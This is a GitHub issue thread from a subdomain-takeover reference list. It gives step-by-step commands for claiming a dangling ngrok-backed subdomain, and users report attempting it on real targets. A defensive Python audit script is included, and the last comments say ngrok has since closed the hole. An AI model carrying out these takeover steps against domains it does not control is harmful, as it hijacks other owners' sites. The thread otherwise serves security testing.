EdOverflow / can-i-take-over-xyz

"Can I take over XYZ?" — a list of services and how to claim (sub)domains with dangling DNS records.


subdomain takeover via ngrok service

PareshParmar opened this issue · comments

Service name

ngrok
This is already mentioned in #85, but a few steps are missing there, and that won't work.
When you run ./ngrok http 80 -subdomain cnameentry it will run ngrok on the CNAME domain only, not the subdomain. I set up ngrok on my own subdomain to test it.

Proof

If you visit the vulnerable subdomain, the error will be: Tunnel subdomain.example.com not found
Check the CNAME entry of the subdomain; it will be something like http://xxxxxxxx.cname.us.ngrok.io/

  1. Set up an account on https://ngrok.com/

  2. The subdomain service for ngrok is only available on the paid version.
    I suggest you purchase the paid version: https://dashboard.ngrok.com/billing (15-day money-back policy)

  3. Once your account is done, set up ngrok on your local machine, following these steps: https://dashboard.ngrok.com/get-started

  4. Once you're done with the local setup, go here: https://dashboard.ngrok.com/reserved
    where you can reserve the vulnerable subdomain. Enter the subdomain and click on reserve.

  5. Now go to your local machine and run this command to take over the subdomain:
    ngrok http -region=us -hostname=subdomain.example.com 80


Documentation

https://ngrok.com/docs
Check "Tunnels on custom domains (white label URLs)".
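As an added example (not code from the can-i-take-over-xyz project or from ngrok), here is a Python check a zone owner can run over their own records to flag the fingerprint this issue describes: a CNAME to <random>.cname.<region>.ngrok.io together with a "Tunnel <host> not found" response body. The zone records, HTTP bodies, host names and the CNAME pattern are constructed assumptions; whether such a name could still be claimed is a separate question that later comments on this thread address.

```python
"""Audit a zone you administer for dangling ngrok CNAMEs.

Added example, not code from can-i-take-over-xyz or ngrok. It encodes the fingerprint
described in this thread: a CNAME to <random>.cname.<region>.ngrok.io whose HTTP body
reads "Tunnel <host> not found". All records and bodies below are constructed."""
import re
from dataclasses import dataclass

# Assumption: ngrok custom-domain CNAME targets look like the one quoted in the thread.
NGROK_CNAME_RE = re.compile(r"^[a-z0-9]+\.cname\.(?P<region>[a-z]{2})\.ngrok\.io\.?$", re.I)
TUNNEL_NOT_FOUND_RE = re.compile(r"Tunnel\s+(?P<host>[A-Za-z0-9.-]+)\s+not found")

@dataclass
class Finding:
    host: str
    cname: str
    region: str
    verdict: str  # "dangling", "served" or "review"

def classify(host, cname, body):
    """Return a Finding for an ngrok-backed host, or None if the CNAME is not ngrok's."""
    m = NGROK_CNAME_RE.match(cname.strip())
    if not m:
        return None
    norm = lambda n: n.lower().rstrip(".")
    hit = TUNNEL_NOT_FOUND_RE.search(body or "")
    if hit and norm(hit.group("host")) == norm(host):
        verdict = "dangling"  # ngrok's edge answers, but no tunnel is bound to this hostname
    elif hit:
        verdict = "review"    # "not found" names another host (e.g. the CNAME target itself)
    else:
        verdict = "served"    # a tunnel is answering for this hostname
    return Finding(norm(host), norm(cname), m.group("region").lower(), verdict)

def audit(records, bodies):
    """records: iterable of (host, cname); bodies: {host: HTTP body}. Non-ngrok hosts are skipped."""
    return [f for f in (classify(h, c, bodies.get(h)) for h, c in records) if f]

# Constructed zone excerpt and the body an HTTP GET to each host returned.
SAMPLE_RECORDS = [
    ("app.example.com", "abc12345.cname.us.ngrok.io."),
    ("demo.example.com", "zzz99999.cname.eu.ngrok.io."),
    ("old.example.com", "qqq77777.cname.us.ngrok.io."),
]
SAMPLE_BODIES = {
    "app.example.com": "Tunnel app.example.com not found",
    "demo.example.com": "<html>demo tunnel is up</html>",
    "old.example.com": "Tunnel qqq77777.cname.us.ngrok.io not found",
}
```

Records whose CNAME does not point at ngrok are skipped, so the audit can be run over a full zone export.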

@PareshParmar @EdOverflow

I found a target with this error: Tunnel subdomain.example.com not found
I looked up its CNAME and found a CNAME like: http://abc.cname.us.ngrok.io

When I tried to reserve subdomain.example.com it says unavailable,

but when I tried to reserve the CNAME I successfully reserved it.

I don't have access to subdomain.example.com, but I have access to its CNAME.

What to do now? Kindly help me out.

Thanks

In my case, for subdomain.example.com:

The victim has access to subdomain.example.com
and I have access to its CNAME: http://example.cname.us.ngrok.io

But still the content of http://example.cname.us.ngrok.io is not showing up on subdomain.example.com.

Hi,

You're doing the steps wrong.
1. Add the vulnerable domain to your account's custom domain list, not the CNAME entry.
2. Once you add that, run this command:
ngrok http -region=us -hostname=vulnerable.subdomain.com 80

Here's my blog post: https://blog.pareshparmar.com/subdomain-takeover-ngrok/
Let me know if you still face any issue.

Thanks for your reply. I am still unable to take it over; can you point out where I am going wrong?

1- I have also added a custom domain (e.g. vulnerabledomain.com) that I successfully own.

2- When I tried to add subdomain.vulnerabledomain.com it says unavailable.

3- Then I tried to run these commands in Windows:

3 (a): CMD:

ngrok.exe http -region=us -hostname=subdomain.vulnerabledomain.com 1337

Result:

This domain is reserved for another account.
Failed to bind the domain ' cx***.*******.**m ' for the account 'Tayyab Qadir'.

3 (b): CMD:

ngrok.exe http -region=us -hostname=vulnerabledomain.com 1337

Connection built successfully.

Can you send me a message via Facebook to resolve this matter?
https://www.facebook.com/tqMr.EditOr I hope the problem will be resolved quickly.

Thanks

Best Wishes
Tayyab Qadir

Hi, as you mentioned, in the second step it says unavailable, which means the subdomain is added to another account.

But feel free to DM me and I'll check: https://twitter.com/Paresh_parmar1

I have a subdomain which is pointing to {{random-string}}.cname.{{zone}}.ngrok.io. The CNAME is showing the error "Tunnel {{ngrok-cname}} not found", but the subdomain pointing to it is showing some other response, which is "No webpage was found {{domain name}} - (404)". So do you think this can be taken over? And how do you think I can take it over, given there's a random string in the CNAME? How can I, as an attacker, control that and take it over if there's a random string, as on some other ngrok takeovers?

Some help will be very much appreciated :)

Hi,

I don't think this is vulnerable, at least not anymore. I've got this instance: xyz.ngrok.io which shows:

Tunnel xyz.ngrok.io not found

I subscribed for a basic plan and tried to take it over but it was unavailable in US, only xyz.eu.ngrok.io, for example, would be up for grabs.

Not Vulnerable.

Another chiming in to say that ngrok no longer appears vulnerable.

I have a "Tunnel qqqq.wwww.com not found" error and CNAME xxxxxxxx.cname.eu.ngrok.io.

If I try to claim qqqq.wwww.com it says that the domain is unavailable. Fixed?

Subdomain takeover via ngrok is not possible anymore!


~ Confirmed by the ngrok team.